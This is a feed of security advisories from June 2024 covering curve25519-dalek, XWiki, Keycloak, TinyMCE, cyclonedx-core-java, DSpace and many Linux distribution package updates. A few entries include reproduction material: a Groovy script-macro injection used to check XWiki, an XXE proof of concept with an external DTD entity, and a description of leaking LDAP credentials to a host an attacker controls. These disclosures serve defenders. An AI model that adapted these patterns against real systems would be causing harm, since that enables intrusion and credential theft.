19.06.2024 03:10:32	rustsec	[RUSTSEC-2024-0344] Timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`	Timing variability of any kind is problematic when working with potentially secret values such aselliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such aproblem was recently discovered in `curve25519-dalek`.The `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask valueinside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) toconditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:- 32-bit (see L106): <https://godbolt.org/z/zvaWxzvqv>- 64-bit (see L48): <https://godbolt.org/z/PczYj7Pda>A similar problem was recently discovered in the Kyber reference implementation:<https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ>As discussed on that thread, one portable solution, which is also used in this PR, is to introduce avolatile read as an optimization barrier, which prevents the compiler from optimizing it away.The fix can be validated in godbolt here:- 32-bit: <https://godbolt.org/z/jc9j7eb8E>- 64-bit: <https://godbolt.org/z/x8d46Yfah>The problem was discovered and the solution independently verified by Alexander Wagner <alexander.wagner@aisec.fraunhofer.de> and Lea Themint <lea.thiemt@tum.de> usingtheir DATA tool:<https://github.com/Fraunhofer-AISEC/DATA>	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0344
18.06.2024 19:34:18	maven	[MAVEN:GHSA-Q2XX-F8R3-9MG5] STRIMZI incorrect access control (high)	Incorrect access control in the Kafka Connect REST API in the STRIMZI Project 0.41.0 and earlier allows an attacker to deny the service for Kafka Mirroring, potentially mirror the topics' content to his Kafka cluster via a malicious connector (bypassing Kafka ACL if it exists), and potentially steal Kafka SASL credentials, by querying the MirrorMaker Kafka REST API.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q2XX-F8R3-9MG5
20.06.2024 19:19:14	maven	[MAVEN:GHSA-J584-J2VJ-3F93] XWiki Platform allows remote code execution from user account (critical)	### ImpactWhen an admin disables a user account, the user's profile is executed with the admin's rights. This allows a user to place malicious code in the user profile before getting an admin to disable the user account.To reproduce, as a user without script nor programming rights, edit the about section of your user profile and add `{{groovy}}services.logging.getLogger("attacker").error("Hello from Groovy!"){{/groovy}}`.As an admin, go to the user profile and click the "Disable this account" button.Then, reload the page. If the logs show `attacker - Hello from Groovy!` then the instance is vulnerable.### PatchesThis has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.### WorkaroundsWe're not aware of any workaround except upgrading.### References* https://jira.xwiki.org/browse/XWIKI-21611* https://github.com/xwiki/xwiki-platform/commit/f89c8f47fad6e5cc7e68c69a7e0acde07f5eed5a	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J584-J2VJ-3F93
20.06.2024 19:22:34	maven	[MAVEN:GHSA-9442-GM4V-R222] Undertow's url-encoded request path information can be broken on ajp-listener (high)	A vulnerability was found in Undertow. URL-encoded request path information can be broken for concurrent requests on ajp-listener, causing the wrong path to be processed and resulting in a possible denial of service.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9442-GM4V-R222
20.06.2024 09:07:08	ubuntu	[USN-6842-1] gdb vulnerabilities (medium)	gdb could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6842-1
20.06.2024 14:36:23	almalinux	[ALSA-2024:4000] ghostscript security update (important)	ghostscript security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4000
20.06.2024 14:33:41	almalinux	[ALSA-2024:3999] ghostscript security update (important)	ghostscript security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3999
20.06.2024 16:53:09	almalinux	[ALSA-2024:4002] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4002
20.06.2024 03:00:00	debian	[DSA-5717-1] php8.2 (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5717-1
20.06.2024 03:00:00	oraclelinux	[ELSA-2024-3999] ghostscript security update (important)	[9.54.0-16]- RHEL-39110 fix regression discovered in OPVP device[9.54.0-15]- RHEL-39110 CVE-2024-33871 ghostscript: OPVP device arbitrary code execution via custom Driver library	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3999
20.06.2024 03:00:00	oraclelinux	[ELSA-2024-4000] ghostscript security update (important)	[9.27-13]- CVE-2024-33871 ghostscript: OPVP device arbitrary code execution via custom Driver library	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4000
20.06.2024 03:00:00	oraclelinux	[ELSA-2024-4002] thunderbird security update (important)	[115.12.1-1.0.1]- Add Oracle prefs[115.12.1]- Add OpenELA debranding[115.12.1-1]- Update to 115.12.1 build1[115.12.0-2]- Update to 115.12.0 build2[115.12.0-1]- Update to 115.12.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4002
20.06.2024 03:00:00	oraclelinux	[ELSA-2024-4016] thunderbird security update (important)	[115.12.1-1.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js- Enabled aarch64 build[115.12.1-1]- Update to 115.12.1 build1[115.12.0-2]- Update to 115.12.0 build2[115.12.0-1]- Update to 115.12.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4016
20.06.2024 03:00:00	redhat	[RHSA-2024:4000] ghostscript security update (important)	The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: OPVP device arbitrary code execution via custom Driver library (CVE-2024-33871)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4000
20.06.2024 03:00:00	redhat	[RHSA-2024:3999] ghostscript security update (important)	The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: OPVP device arbitrary code execution via custom Driver library (CVE-2024-33871)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3999
20.06.2024 03:00:00	redhat	[RHSA-2024:4016] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.12.1.Security Fix(es):* thunderbird: Use-after-free in networking (CVE-2024-5702)* thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688)* thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690)* thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696)* thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4016
20.06.2024 03:00:00	redhat	[RHSA-2024:4036] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.12.1.Security Fix(es):* thunderbird: Use-after-free in networking (CVE-2024-5702)* thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688)* thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690)* thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696)* thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4036
20.06.2024 03:00:00	redhat	[RHSA-2024:4002] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.12.1.Security Fix(es):* thunderbird: Use-after-free in networking (CVE-2024-5702)* thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688)* thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690)* thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696)* thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4002
20.06.2024 17:20:58	npm	[NPM:GHSA-9HCV-J9PV-QMPH] TinyMCE Cross-Site Scripting (XSS) vulnerability using noneditable_regexp option (moderate)	### ImpactA [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE’s content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code were able to be executed when content was extracted from the editor.### PatchesThis vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that, when using the `noneditable_regexp` option, any content within an attribute is properly verified to match the configured regular expression before being added.### FixTo avoid this vulnerability:* Upgrade to TinyMCE 7.2.0 or higher.* Upgrade to TinyMCE 6.8.4 or higher for TinyMCE 6.x.* Upgrade to TinyMCE 5.11.0 LTS or higher for TinyMCE 5.x (only available as part of commercial [long-term support](https://www.tiny.cloud/long-term-support/) contract).### References* [TinyMCE 6.8.4](https://www.tiny.cloud/docs/tinymce/6/6.8.4-release-notes/#overview)* [TinyMCE 7.2.0](https://www.tiny.cloud/docs/tinymce/7/7.2-release-notes/#overview)### For more informationIf you have any questions or comments about this advisory:* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HCV-J9PV-QMPH
20.06.2024 17:23:20	npm	[NPM:GHSA-W9JX-4G6G-RP7X] TinyMCE Cross-Site Scripting (XSS) vulnerability using noscript elements (moderate)	### ImpactA [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) vulnerability was discovered in TinyMCE’s content parsing code. This allowed specially crafted noscript elements containing malicious code to be executed when that content was loaded into the editor.### PatchesThis vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that content within noscript elements are properly parsed.### FixTo avoid this vulnerability:* Upgrade to TinyMCE 7.2.0 or higher.* Upgrade to TinyMCE 6.8.4 or higher for TinyMCE 6.x.* Upgrade to TinyMCE 5.11.0 LTS or higher for TinyMCE 5.x (only available as part of commercial [long-term support](https://www.tiny.cloud/long-term-support/) contract).### AcknowledgementsTiny thanks [Malav Khatri](https://malavkhatri.com/) and another reporter for their help identifying this vulnerability.### References* [TinyMCE 6.8.4](https://www.tiny.cloud/docs/tinymce/6/6.8.4-release-notes/#overview)* [TinyMCE 7.2.0](https://www.tiny.cloud/docs/tinymce/7/7.2-release-notes/#overview)### For more informationIf you have any questions or comments about this advisory:* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W9JX-4G6G-RP7X
20.06.2024 17:14:52	npm	[NPM:GHSA-25HC-QCG6-38WJ] socket.io has an unhandled 'error' event (high)	### ImpactA specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.```node:events:502 throw err; // Unhandled 'error' event ^Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined) at new NodeError (node:internal/errors:405:5) at Socket.emit (node:events:500:17) at /myapp/node_modules/socket.io/lib/socket.js:531:14 at process.processTicksAndRejections (node:internal/process/task_queues:77:11) { code: 'ERR_UNHANDLED_ERROR', context: undefined}```### Affected versions\| Version range \| Needs minor update? \|\|------------------\|------------------------------------------------\|\| `4.6.2...latest` \| Nothing to do \|\| `3.0.0...4.6.1` \| Please upgrade to `socket.io@4.6.2` (at least) \|\| `2.3.0...2.5.0` \| Please upgrade to `socket.io@2.5.1` \|### PatchesThis issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in `socket.io@4.6.2` (released in May 2023).The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c### WorkaroundsAs a workaround for the affected versions of the `socket.io` package, you can attach a listener for the "error" event:```jsio.on("connection", (socket) => { socket.on("error", () => { // ... });});```### For more informationIf you have any questions or comments about this advisory:- Open a discussion [here](https://github.com/socketio/socket.io/discussions)Thanks a lot to [Paul Taylor](https://github.com/Y0ursTruly) for the responsible disclosure.### References- https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115- https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-25HC-QCG6-38WJ
19.06.2024 14:13:12	ubuntu	[USN-6841-1] PHP vulnerability (medium)	PHP could be made to accept invalid URLs.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6841-1
19.06.2024 10:27:59	ubuntu	[USN-6839-1] MariaDB vulnerability (medium)	A security issue was fixed in MariaDB	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6839-1
19.06.2024 05:46:18	ubuntu	[USN-6840-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6840-1
19.06.2024 12:17:27	almalinux	[ALSA-2024:3968] container-tools:rhel8 bug fix and enhancement update (moderate)	container-tools:rhel8 bug fix and enhancement update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3968
19.06.2024 12:15:05	almalinux	[ALSA-2024:3961] flatpak security update (important)	flatpak security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3961
19.06.2024 12:10:34	almalinux	[ALSA-2024:3954] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3954
19.06.2024 12:12:22	almalinux	[ALSA-2024:3955] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3955
19.06.2024 12:13:38	almalinux	[ALSA-2024:3959] flatpak security update (important)	flatpak security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3959
21.06.2024 18:52:39	maven	[MAVEN:GHSA-C25H-C27Q-5QPV] Keycloak leaks configured LDAP bind credentials through the Keycloak admin console (low)	### ImpactThe LDAP testing endpoint allows to change the Connection URL independently of and without having to re-enter the currently configured LDAP bind credentials. An attacker with admin access (permission manage-realm) can change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker.As a consequence, an attacker who has compromised the admin console/compromised a user with sufficient privileges can leak domain credentials and can now attack the domain.### AcknowledgementsSpecial thanks to Simon Wessling for reporting this issue and helping us improve our project	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C25H-C27Q-5QPV
21.06.2024 18:06:27	maven	[MAVEN:GHSA-V2XM-76PQ-PHCF] ClassGraph XML External Entity Reference (moderate)	ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V2XM-76PQ-PHCF
21.06.2024 10:20:21	almalinux	[ALSA-2024:4036] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4036
21.06.2024 18:52:30	maven	[MAVEN:GHSA-GMRM-8FX4-66X7] Duplicate Advisory: Keycloak: Leak of configured LDAP bind credentials (low)	## Duplicate AdvisoryThis advisory has been withdrawn because it is a duplicate of GHSA-c25h-c27q-5qpv. This link is maintained to preserve external references.## Original DescriptionA vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GMRM-8FX4-66X7
22.06.2024 23:12:20	slackware	[SSA:2024-174-01] emacs	New emacs packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/emacs-29.4-i586-1_slack15.0.txz: Upgraded. Emacs 29.4 is an emergency bugfix release intended to fix a security vulnerability: Arbitrary shell commands are no longer run when turning on Org mode. This is for security reasons, to avoid running malicious commands. (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/emacs-29.4-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/emacs-29.4-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/e/emacs-29.4-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/e/emacs-29.4-x86_64-1.txzMD5 signaturesSlackware 15.0 package:f8dd0514f953401e675d6f80895f43b1 emacs-29.4-i586-1_slack15.0.txzSlackware x86_64 15.0 package:100d1844e95b9b29c693c64c05c7a063 emacs-29.4-x86_64-1_slack15.0.txzSlackware -current package:527623759822b154558121c13de1cd18 e/emacs-29.4-i586-1.txzSlackware x86_64 -current package:fb6c3393bb28dd9fedd887e70c3d9564 e/emacs-29.4-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg emacs-29.4-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-174-01
22.06.2024 03:00:00	gentoo	[GLSA-202406-05] JHead: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in JHead, the worst of which may lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-05
22.06.2024 03:00:00	gentoo	[GLSA-202406-01] GLib: Privilege Escalation (high)	A vulnerability has been discovered in GLib, which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-01
22.06.2024 03:00:00	gentoo	[GLSA-202406-02] Flatpak: Sandbox Escape (high)	A vulnerability has been discovered in Flatpak, which can lead to a sandbox escape.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-02
22.06.2024 03:00:00	gentoo	[GLSA-202406-03] RDoc: Remote Code Execution (high)	A vulnerability has been discovered in RDoc, which can lead to execution of arbitrary code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-03
22.06.2024 03:00:00	gentoo	[GLSA-202406-04] LZ4: Memory Corruption (normal)	A vulnerability has been discovered in LZ4, which can lead to memory corruption.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202406-04
24.06.2024 23:44:49	maven	[MAVEN:GHSA-683X-4444-JXH8] Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java (high)	### ImpactBefore deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.XXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.### PoC```javaimport org.cyclonedx.parsers.XmlParser;class Poc { public static void main(String[] args) { // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused new XmlParser().parse(""" <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]> <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/> """.getBytes()); }}```### PatchesThe vulnerability has been fixed in _cyclonedx-core-java_ version 0.9.4.### WorkaroundsIf feasible, applications can reject XML documents before handing them to _cyclonedx-core-java_ for parsing.This may be an option if incoming CycloneDX BOMs are known to be in JSON format.### References* Issue was fixed via <https://github.com/CycloneDX/cyclonedx-core-java/pull/434>* Issue was introduced via <https://github.com/CycloneDX/cyclonedx-core-java/commit/162aa594f347b3f612fe0a45071693c3cd398ce9>* <https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing>* <https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression>	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-683X-4444-JXH8
25.06.2024 00:27:58	maven	[MAVEN:GHSA-QCJ3-WPGM-QPXH] XWiki programming rights may be inherited by inclusion (critical)	### ImpactThe content of a document included using `{{include reference="targetdocument"/}}` is executed with the right of the includer and not with the right of its author.This means that any user able to modify the target document can impersonate the author of the content which used the `include` macro.### PatchesThis has been patched in XWiki 15.0 RC1 by making the default behavior safe.### WorkaroundsMake sure to protect any included document to make sure only allowed users can modify it.A workaround have been provided in 14.10.2 to allow forcing to execute the included content with the target content author instead of the default behavior. See https://extensions.xwiki.org/xwiki/bin/view/Extension/Include%20Macro#HAuthor for more details.### Referenceshttps://jira.xwiki.org/browse/XWIKI-5027https://jira.xwiki.org/browse/XWIKI-20471### For more informationIf you have any questions or comments about this advisory:* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)* Email us at [Security Mailing List](mailto:security@xwiki.org)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QCJ3-WPGM-QPXH
24.06.2024 13:11:08	ubuntu	[USN-6844-1] CUPS vulnerability (medium)	CUPS could be made to arbitrary chmod paths with speciallycrafted configuration file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6844-1
24.06.2024 13:08:06	ubuntu	[USN-6845-1] Hibernate vulnerability (high)	Hibernate could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6845-1
25.06.2024 00:31:15	maven	[MAVEN:GHSA-36GF-VPJ2-J42W] Cross site scripting in Apache JSPWiki (moderate)	XSS in Upload page in Apache JSPWiki 2.12.1 and priors allows the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.2 or later.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-36GF-VPJ2-J42W
24.06.2024 15:16:49	almalinux	[ALSA-2024:4058] python3.11 security update (important)	python3.11 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4058
24.06.2024 03:00:00	debian	[DSA-5715-2] composer	regression update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5715-2
24.06.2024 03:00:00	oraclelinux	[ELSA-2024-4050] libreswan security update (moderate)	[4.12-2.0.1.1]- Add libreswan-oracle.patch to detect Oracle Linux distro[4.12-2.1]- Fix CVE-2024-3652 (RHEL-40102)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4050
24.06.2024 03:00:00	oraclelinux	[ELSA-2024-4058] python3.11 security update (important)	[3.11.9-1.0.1]- Update rpm-macros description [Orabug: 36024572][3.11.9-1]- Rebase to 3.11.9- Security fixes for CVE-2023-6597 and CVE-2024-0450- Fix expat tests for the latest expat security releaseResolves: RHEL-33672, RHEL-33684	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4058
24.06.2024 03:00:00	redhat	[RHSA-2024:4058] python3.11 security update (important)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)* python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4058
24.06.2024 15:13:31	almalinux	[ALSA-2024:4050] libreswan security update (moderate)	libreswan security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4050
23.06.2024 03:00:00	redhat	[RHSA-2024:4050] libreswan security update (moderate)	Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4050
23.06.2024 03:00:00	freebsd	[FREEBSD:4F6C4C07-3179-11EF-9DA5-1C697A616631] emacs -- Arbitrary shell code evaluation vulnerability	GNU Emacs developers report: Emacs 29.4 is an emergency bugfix release intended to fix a security vulnerability. Arbitrary shell commands are no longer run when turning on Org mode in order to avoid running malicious code.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:4F6C4C07-3179-11EF-9DA5-1C697A616631
25.06.2024 22:30:08	ubuntu	[USN-6849-1] Salt vulnerabilities (critical)	Several security issues were fixed in Salt.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6849-1
25.06.2024 21:42:35	ubuntu	[USN-6746-2] Google Guest Agent and Google OS Config Agent vulnerability	Google Guest Agent and OS Config Agent could be made to crashif it open a specially crafted JSON.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6746-2
25.06.2024 21:16:54	ubuntu	[USN-6848-1] Roundcube vulnerabilities (medium)	Roundcube could be made to crash or run programs if it received speciallycrafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6848-1
25.06.2024 20:25:36	go	[GO-2024-2947] Leak of sensitive information to log files ingithub.com/hashicorp/go-retryablehttp (medium)	URLs were not sanitized when writing them to log files. This could lead towriting sensitive HTTP basic auth credentials to the log file.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2947
25.06.2024 20:07:32	maven	[MAVEN:GHSA-94CC-XJXR-PWVF] DSpace Cross Site Scripting (XSS) via a deposited HTML/XML document (low)	### ImpactIn DSpace 7.0 through 7.6.1, when an HTML, XML or JavaScript Bitstream is downloaded, the user's browser _may_ execute any embedded JavaScript. If that embedded JavaScript is malicious, there is a risk of an XSS attack.This attack may only be initialized by a user who already has Submitter privileges in the repository. The submitter must upload the malicious HTML/XML/JavaScript file themselves. The attack itself would not occur until a different authenticated user downloads the malicious file. CORS and CSRF protection built into DSpace help to limit the impact of the attack (and may block it in some scenarios).If the repository is configured to only download HTML / XML / JavaScript Bitstreams using the [`Content-Disposition: attachment`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition) header, then the attack is no longer possible. See "Workarounds" below.### PatchesThe fix is included in both 8.0 and 7.6.2. Please upgrade to one of these versions, or manually apply one of the "Workarounds" below.If you are already running 7.6 or 7.6.1, then this vulnerability can be fixed via a configuration update in your `dspace.cfg` configuration file. See details in below.### WorkaroundsDSpace sites running 7.6 or 7.6.1 can fix this issue by adding the following `webui.content_disposition_format` settings to their `dspace.cfg` (or `local.cfg`). These settings force all HTML, XML, RDF & JavaScript files to always be downloaded to a user's machine, blocking the attack. For more details see [PR #9638](https://github.com/DSpace/DSpace/pull/9638)```webui.content_disposition_format = text/htmlwebui.content_disposition_format = text/javascriptwebui.content_disposition_format = text/xmlwebui.content_disposition_format = rdf```These settings will take effect immediately. There is no need to restart Tomcat.To verify the settings are working: upload an HTML or XML file to an in-progress submission. Attempt to download the file. The file should not open in your browser window. Instead, it should download to your local computer.DSpace sites running 7.0 through 7.5 will need to either (CHOOSE ONE):* Upgrade to 7.6.2 or 8.0* Or, upgrade to 7.6 or 7.6.1 and then apply the configuration change mentioned above* Or, manually add the `webui.content_disposition_format` setting (which was first released in 7.6), and then apply the configuration changes mentioned above. * The `webui.content_disposition_format` setting can be added by applying the changes in [PR #8891](https://github.com/DSpace/DSpace/pull/8891). A [`patch` file](https://github.com/DSpace/DSpace/pull/8891.patch) is also available. * Please be aware this patch may not apply cleanly to all prior versions of 7.x. In that scenario, you would need to find a way to manually apply the changes or consider a different workaround.* Or, find a way in your Apache or NGinx proxy to force the `Content-Disposition: attachment` header to be sent for all files downloaded via `/server/api/core/bitstreams/[uuid]/content` in the REST API. * NOTE: This workaround will patch the vulnerability. However, it does so by no longer allowing users to open _any_ downloaded files in their browser window. (This behavior may or may not be desirable in the long term, so you may wish to remove it in the future, once you have upgraded.) * For example, in Apache, using "mod_headers", you may add a configuration similar to this in your `<VirtualHost>`: ``` # Set "Content-Disposition: attachment" whenever path is /server/api/core/bitstreams/[uuid]/content Header set Content-Disposition attachment 